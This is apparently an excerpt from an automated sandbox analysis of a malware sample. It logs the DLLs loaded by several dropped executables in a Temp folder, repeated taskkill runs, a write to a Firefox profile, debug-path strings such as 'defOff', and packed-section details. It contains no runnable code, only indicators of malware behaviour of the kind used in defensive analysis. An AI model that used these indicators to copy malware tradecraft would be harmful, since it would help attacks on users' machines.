Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3003904 > 1048576
Source: file.exe Static PE information: Raw size of pfboyhbl is bigger than: 0x100000 < 0x2b1a00
Source: Binary string: my_library.pdbU source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999432818.0000000000192000.00000040.00000001.01000000.00000006.sdmp, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000003.1866208811.0000000005110000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Unpacked PE file: 2.2.QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.190000.0.unpack :EW;.rsrc:W;.idata :W;ucxgvins:EW;nulvttal:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Unpacked PE file: 3.2.EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.460000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
